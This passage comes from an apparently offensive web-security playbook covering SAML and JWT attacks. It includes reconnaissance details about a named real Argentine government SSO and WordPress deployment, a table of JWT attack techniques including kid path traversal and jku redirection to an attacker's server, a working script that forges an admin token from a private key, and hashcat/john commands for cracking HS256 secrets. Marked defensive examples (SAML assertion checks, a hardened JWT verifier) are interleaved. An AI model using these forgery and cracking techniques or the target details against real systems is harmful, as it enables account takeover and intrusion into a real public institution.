&lt;td&gt;Does SP accept assertion from unauthorized IdP?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Audience Restriction Bypass&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Modify Audience&lt;/td&gt;
&lt;td&gt;Does SP accept assertion for different Audience?&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
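&lt;p&gt;On the service-provider side most rows of this table reduce to checks that are cheap to get right and easy to forget. The block below is an added example, not code from this playbook or from SimpleSAMLphp: stdlib-only Python (3.8 or newer, for the comment-aware parser) that builds constructed test assertions with a hypothetical SP entity ID &lt;code&gt;urn:example:sp&lt;/code&gt; and a placeholder Signature element, then rejects signature stripping, comment nodes inside NameID, audience mismatch, expiry and replay. XSW and key confusion are not covered: they need real XML-DSig verification against the pinned IdP certificate, which this block assumes happens separately.&lt;/p&gt;

```python
"""Service-provider side checks for an inbound SAML 2.0 assertion.

Added example, stdlib only. Signature *verification* needs an XML-DSig
library (e.g. xmlsec) and is not done here: this block covers the checks
an SP can still get wrong with a valid signature, matching the table rows
Signature Stripping, Comment Injection, Replay and Audience Restriction.
"""
import datetime as dt
import xml.etree.ElementTree as ET

NS_SAML = "urn:oasis:names:tc:SAML:2.0:assertion"
NS_DS = "http://www.w3.org/2000/09/xmldsig#"

# Hypothetical SP entity ID for the constructed samples below.
EXPECTED_AUDIENCE = "urn:example:sp"


def build_assertion(assertion_id, audience, name_id_parts, not_on_or_after, signed=True):
    """Construct a minimal test assertion (not a real IdP's output).

    name_id_parts is a list of strings; the marker "#comment" becomes an
    XML comment node, which reproduces the comment-injection case.
    """
    ET.register_namespace("saml", NS_SAML)
    ET.register_namespace("ds", NS_DS)
    root = ET.Element("{%s}Assertion" % NS_SAML, ID=assertion_id)
    subject = ET.SubElement(root, "{%s}Subject" % NS_SAML)
    name_id = ET.SubElement(subject, "{%s}NameID" % NS_SAML)
    last = None
    for part in name_id_parts:
        if part == "#comment":
            last = ET.Comment("injected")
            name_id.append(last)
        elif last is None:
            name_id.text = (name_id.text or "") + part
        else:
            last.tail = (last.tail or "") + part
    conditions = ET.SubElement(root, "{%s}Conditions" % NS_SAML, NotOnOrAfter=not_on_or_after)
    restriction = ET.SubElement(conditions, "{%s}AudienceRestriction" % NS_SAML)
    ET.SubElement(restriction, "{%s}Audience" % NS_SAML).text = audience
    if signed:
        # Placeholder element only; a real ds:Signature carries SignedInfo etc.
        ET.SubElement(root, "{%s}Signature" % NS_DS)
    return ET.tostring(root, encoding="unicode")


class ReplayCache:
    """Assertion IDs already consumed (in production: shared store with TTL)."""

    def __init__(self):
        self.ids = set()


def check_assertion(xml_text, cache, expected_audience=EXPECTED_AUDIENCE, now=None):
    """Return (accepted, reason, name_id). Checks run strictest-first."""
    now = now or dt.datetime.now(dt.timezone.utc)
    # Keep comment nodes when parsing so a comment inside NameID is visible;
    # the default parser silently drops them and joins the text around them.
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    root = ET.fromstring(xml_text, parser=parser)
    if root.tag != "{%s}Assertion" % NS_SAML:
        return False, "not an Assertion", None
    # Signature stripping: unsigned assertions are rejected outright.
    if root.find("{%s}Signature" % NS_DS) is None:
        return False, "missing signature", None
    # Comment injection: any comment node inside NameID is a red flag.
    name_id = root.find("{%s}Subject/{%s}NameID" % (NS_SAML, NS_SAML))
    if name_id is None:
        return False, "missing NameID", None
    for child in name_id:
        if child.tag is ET.Comment:
            return False, "comment node inside NameID", None
    # Audience restriction: the assertion must be addressed to this SP.
    audience = root.find("{%s}Conditions/{%s}AudienceRestriction/{%s}Audience" % (NS_SAML, NS_SAML, NS_SAML))
    if audience is None or audience.text != expected_audience:
        return False, "audience mismatch", None
    # Validity window: NotOnOrAfter is exclusive.
    conditions = root.find("{%s}Conditions" % NS_SAML)
    stamp = conditions.get("NotOnOrAfter") if conditions is not None else None
    if not stamp:
        return False, "missing NotOnOrAfter", None
    expiry = dt.datetime.fromisoformat(stamp.replace("Z", "+00:00"))
    if now >= expiry:
        return False, "assertion expired", None
    # Replay: each assertion ID is accepted exactly once.
    assertion_id = root.get("ID")
    if not assertion_id or assertion_id in cache.ids:
        return False, "replayed assertion ID", None
    cache.ids.add(assertion_id)
    return True, "ok", name_id.text
```

The parser choice is the point: ElementTree's default parser drops comments and joins the text on either side, which hides the injection from any later string check. Keeping the nodes makes it detectable, and a stricter SP simply rejects any NameID that is not a single text node.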
&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: &lt;code&gt;autenticacion.mpf.gob.ar&lt;/code&gt; — SimpleSAMLphp IdP with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Metadata exposed at &lt;code&gt;/saml2/idp/metadata.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Entity ID: &lt;code&gt;urn:x-simplesamlphp:autenticacion-idp&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Valid Sectigo certificate (Jan 2026-Feb 2027)&lt;/li&gt;
&lt;li&gt;SP: &lt;code&gt;urn:www.mpf.gob.ar&lt;/code&gt; with ACS at &lt;code&gt;https://www.mpf.gob.ar/wp-login.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;NameIDFormat: &lt;code&gt;transient&lt;/code&gt; (does not allow correlation)&lt;/li&gt;
&lt;li&gt;79 XMLRPC methods in WordPress protected by SSO&lt;/li&gt;
&lt;li&gt;Additional subdomains in certificate SAN: &lt;code&gt;fiscales.gob.ar&lt;/code&gt;, &lt;code&gt;fiscales.gov.ar&lt;/code&gt;, &lt;code&gt;mpf.gov.ar&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2 id="16-jwt--complete-attacks" &gt;
&lt;div&gt;
&lt;a href="#16-jwt--complete-attacks"&gt;
#
&lt;/a&gt;
16. JWT — COMPLETE ATTACKS
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="161-decode-jwt-without-signature-verification" &gt;
&lt;div&gt;
&lt;a href="#161-decode-jwt-without-signature-verification"&gt;
##
&lt;/a&gt;
16.1 Decode JWT (without signature verification)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# jwt.io or Python:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;import base64, json
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;token&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.xxx&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;def decode_jwt&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;token&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;parts&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; token.split&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;.&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Header&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;h&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; json.loads&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;base64.urlsafe_b64decode&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;parts&lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt;0&lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; + &lt;span style="color:#a6d189"&gt;&amp;#39;===&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;.decode&lt;span style="color:#99d1db;font-weight:bold"&gt;())&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Payload&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;p&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; json.loads&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;base64.urlsafe_b64decode&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;parts&lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt;1&lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; + &lt;span style="color:#a6d189"&gt;&amp;#39;===&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;.decode&lt;span style="color:#99d1db;font-weight:bold"&gt;())&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; h, p
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;header, &lt;span style="color:#f2d5cf"&gt;payload&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; decode_jwt&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;token&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;&amp;#34;Alg: {header.get(&amp;#39;alg&amp;#39;)}&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;f&lt;span style="color:#a6d189"&gt;&amp;#34;Payload: {payload}&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="162-attacks-by-algorithm" &gt;
&lt;div&gt;
&lt;a href="#162-attacks-by-algorithm"&gt;
##
&lt;/a&gt;
16.2 Attacks by Algorithm
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Attack&lt;/th&gt;
&lt;th&gt;Algorithm&lt;/th&gt;
&lt;th&gt;How&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;alg=none&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Any&lt;/td&gt;
&lt;td&gt;Remove signature, header &lt;code&gt;{&amp;quot;alg&amp;quot;:&amp;quot;none&amp;quot;}&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;RS256→HS256 confusion&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;RS256&lt;/td&gt;
&lt;td&gt;Uses public key as HMAC secret&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;HS256 weak secret&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;HS256&lt;/td&gt;
&lt;td&gt;Brute force the secret (wordlist)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;kid injection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Any&lt;/td&gt;
&lt;td&gt;kid=../../../etc/passwd → path traversal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;jku/jwk injection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Any&lt;/td&gt;
&lt;td&gt;Point jku/jwk to attacker&amp;rsquo;s server&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;exp not validated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Any&lt;/td&gt;
&lt;td&gt;Expired token still accepted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;aud not validated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Any&lt;/td&gt;
&lt;td&gt;Token from another service accepted&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
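&lt;p&gt;Every row in this table is a decision the verifier makes, so the table reads best as a checklist for the verifier. The following is an added example, not code from this playbook: a stdlib-only HS256 verifier that pins the algorithm server-side (closing alg=none and RS256/HS256 confusion), never reads kid, jku or jwk from the token, enforces exp and aud, and compares signatures in constant time. The secret, the audience &lt;code&gt;urn:example:api&lt;/code&gt; and the claims are constructed; &lt;code&gt;sign_hs256&lt;/code&gt; is there to mint tokens for the checks.&lt;/p&gt;

```python
"""Hardened HS256 JWT verification (added example, stdlib only).

Each rejection below maps to a row of the attacks-by-algorithm table:
alg=none and RS256/HS256 confusion (algorithm pinned server-side, never
taken from the token), kid/jku/jwk (header key hints ignored entirely),
exp and aud (both enforced). Secret and claims are constructed.
"""
import base64
import hashlib
import hmac
import json
import time

# Constructed demo secret. In production: long, random, loaded from a secret
# store, never shipped in a JS bundle.
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"
EXPECTED_AUD = "urn:example:api"


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text):
    # Add only the padding that is actually missing.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims, secret=SERVER_SECRET, header=None):
    """Issue a token. The header override exists so tests can build bad ones."""
    header = header or {"alg": "HS256", "typ": "JWT"}
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    mac = hmac.new(secret, ("%s.%s" % (h, p)).encode(), hashlib.sha256).digest()
    return "%s.%s.%s" % (h, p, b64url_encode(mac))


def verify_hs256(token, secret=SERVER_SECRET, expected_aud=EXPECTED_AUD, now=None):
    """Return (claims, None) on success or (None, reason) on rejection."""
    now = int(time.time()) if now is None else now
    parts = token.split(".")
    if len(parts) != 3:
        return None, "malformed token"
    h_b64, p_b64, s_b64 = parts
    try:
        header = json.loads(b64url_decode(h_b64))
        claims = json.loads(b64url_decode(p_b64))
        sig = b64url_decode(s_b64)
    except (ValueError, UnicodeDecodeError):
        return None, "malformed token"
    if not isinstance(header, dict) or not isinstance(claims, dict):
        return None, "malformed token"
    # alg=none and algorithm confusion: the verifier decides the algorithm,
    # the token merely has to agree with it. jku/jwk/kid are never consulted.
    if header.get("alg") != "HS256":
        return None, "unexpected alg %r" % header.get("alg")
    expected = hmac.new(secret, ("%s.%s" % (h_b64, p_b64)).encode(), hashlib.sha256).digest()
    # Constant-time comparison: a plain == leaks timing information.
    if not hmac.compare_digest(sig, expected):
        return None, "bad signature"
    exp = claims.get("exp")
    if not isinstance(exp, int) or now >= exp:
        return None, "expired or missing exp"
    aud = claims.get("aud")
    aud_list = aud if isinstance(aud, list) else [aud]
    if expected_aud not in aud_list:
        return None, "audience mismatch"
    return claims, None
```

Note the order: the signature is checked before any claim is trusted, and a missing exp is treated the same as an expired one, so a token without a lifetime never passes by accident.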
&lt;h3 id="163-jwt-forgery-with-rsa-private-key" &gt;
&lt;div&gt;
&lt;a href="#163-jwt-forgery-with-rsa-private-key"&gt;
##
&lt;/a&gt;
16.3 JWT Forgery with RSA Private Key
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; hashes
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives.asymmetric&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; padding &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; pad
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives.serialization&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; load_pem_private_key
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.backends&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; default_backend
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;base64&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;json&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;with&lt;/span&gt; &lt;span style="color:#99d1db"&gt;open&lt;/span&gt;(&lt;span style="color:#a6d189"&gt;&amp;#39;private.key&amp;#39;&lt;/span&gt;) &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; f:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; key &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; load_pem_private_key(f&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;read()&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(), password&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;None&lt;/span&gt;, backend&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;default_backend())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;forge_jwt&lt;/span&gt;(payload, alg&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;RS256&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;alg&amp;#34;&lt;/span&gt;: alg, &lt;span style="color:#a6d189"&gt;&amp;#34;typ&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;JWT&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; h &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;dumps(header)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode())&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; p &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;dumps(payload)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode())&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sig &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; key&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;sign(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;h&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;p&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode(), pad&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;PKCS1v15(), hashes&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;SHA256())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; s &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(sig)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;h&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;p&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;s&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Example: forge an admin token&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;admin_token &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; forge_jwt({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;sub&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;email&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;admin@target.com&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;role&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;admin&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;iat&amp;#34;&lt;/span&gt;: &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;(time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time()),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;exp&amp;#34;&lt;/span&gt;: &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;(time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time()) &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;3600&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;⚠️ WARNING — Limitations&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Laravel Passport&lt;/strong&gt;: validates &lt;code&gt;jti&lt;/code&gt; against &lt;code&gt;oauth_access_tokens&lt;/code&gt; table. Token forged with RSA key but not registered in DB → access denied.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Auth0&lt;/strong&gt;: validates signature against JWKS endpoint. Local private key doesn&amp;rsquo;t work if the server validates with JWKS.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Firebase Auth&lt;/strong&gt;: tokens are validated against Google&amp;rsquo;s JWKS. Local key is useless.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="164-brute-force-hs256-secret" &gt;
&lt;div&gt;
&lt;a href="#164-brute-force-hs256-secret"&gt;
##
&lt;/a&gt;
16.4 Brute Force HS256 Secret
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Using hashcat&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;hashcat -m &lt;span style="color:#ef9f76"&gt;16500&lt;/span&gt; jwt_token.txt /usr/share/wordlists/rockyou.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Using john&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;john jwt.txt --wordlist&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;rockyou.txt --format&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;HMAC-SHA256
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Simple Python script&lt;/span&gt;
